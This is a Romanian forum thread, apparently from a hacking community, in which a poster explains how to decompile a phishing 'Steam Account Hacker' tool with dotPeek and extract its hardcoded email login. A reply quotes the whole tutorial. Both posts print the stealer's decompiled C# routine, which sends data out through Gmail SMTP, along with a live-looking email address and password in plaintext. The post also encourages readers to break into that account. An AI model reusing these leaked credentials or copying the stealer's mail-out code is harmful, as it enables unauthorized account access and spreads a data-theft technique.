Jump to content
raynor009

[TUTORIAL]Hack the thieves

Recommended Posts

Salut, RST si bun venit. Astazi am sa va arat cum sa decompilam phishere si sa extragem din ele emailul si parola. Este extrem de simplu si nu necesita cunostinte mari de programare. Sa incepem.

Pasul 1:

-descarcam un decompiler gratuit numit dotPeek

-cautam o victima, ca se ne fie mai usor ne vom uita pe YouTube...acolo gasim o caruta de phishere....Pentru scopul "educativ" al acestui tutorial deja am gasit o victima aici

Pasul 2:

Extragem arhiva si deschidem dotPeek, aveti rabdare dureza putin.Dupa ce ati deschis programul extrageti arhiva cu phisherul si mutati phisherul peste lista din stanga lui dotPeek.Dureaza 10-15 secunde ca sa il citeasca.

Pasul 3:

In functie de net framework'ul in care a fost construit programul va uitati ori la .Net Framework v3.5 ori v4.0 .Acesta a fost facut cu versiunea 3.5.Deschideti o ramura la v3.5 dupa aceea inca odata la Steam Account Hacker v1.3.Odata acolo deschideti o alta ramura la Steam_Account_Hacker_v1._3 si apoi apasati pe Form1.Asteptati sa se incarce si dupa aceea mergeti chiar la sfarsitul paginii.Si va uitati dupa ceva in genul acesta.

private void Button1_Click(object sender, EventArgs e)

{

SmtpClient smtpClient = new SmtpClient();

MailMessage mailMessage = new MailMessage();

smtpClient.Credentials = (ICredentialsByHost) new NetworkCredential("steamprogram@gmail.com", "zieser1l12");

smtpClient.Port = 587;

smtpClient.Host = "smtp.gmail.com";

smtpClient.EnableSsl = true;

smtpClient.Send(new MailMessage()

Cred ca va dati seama singuri ce sunt astea nu ? :)) (EMAIL "steamprogram@gmail.com", PAROLA "zieser1l12");

Mai departe stiti ce sa faceti...sper.... bafta ;) si sper ca va placut acest tutorial.Daca aveti intrebari PM sau postati aici.

Edited by raynor009
  • Upvote 1
Link to comment
Share on other sites

salut, rst si bun venit. Astazi am sa va arat cum sa decompilam phishere si sa extragem din ele emailul si parola. Este extrem de simplu si nu necesita cunostinte mari de programare. Sa incepem.

Pasul 1:

-descarcam un decompiler gratuit numit dotpeek

-cautam o victima, ca se ne fie mai usor ne vom uita pe youtube...acolo gasim o caruta de phishere....pentru scopul "educativ" al acestui tutorial deja am gasit o victima aici

pasul 2:

Extragem arhiva si deschidem dotpeek, aveti rabdare dureza putin.dupa ce ati deschis programul extrageti arhiva cu phisherul si mutati phisherul peste lista din stanga lui dotpeek.dureaza 10-15 secunde ca sa il citeasca.

Pasul 3:

In functie de net framework'ul in care a fost construit programul va uitati ori la .net framework v3.4 ori v4.0 .acesta a fost facut cu versiunea 3.5.deschideti o ramura la v3.5 dupa aceea inca odata la steam account hacker v1.3.odata acolo deschideti o alta ramura la steam_account_hacker_v1._3 si apoi apasati pe form1.asteptati sa se incarce si dupa aceea mergei chiar la sfarsitul paginii.si va uitati dupa ceva in genul acesta.

Private void button1_click(object sender, eventargs e)

{

smtpclient smtpclient = new smtpclient();

mailmessage mailmessage = new mailmessage();

smtpclient.credentials = (icredentialsbyhost) new networkcredential("steamprogram@gmail.com", "zieser1l12");

smtpclient.port = 587;

smtpclient.host = "smtp.gmail.com";

smtpclient.enablessl = true;

smtpclient.send(new mailmessage()

cred ca va dati seama singuri ce sunt astea nu ? :)) (email "steamprogram@gmail.com", parola "zieser1l12");

mai departe stiti ce sa faceti...sper.... Bafta ;) si sper ca va placut acest tutorial.daca aveti intrebari pm sau postati aici.

nice !!!!>:D<

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...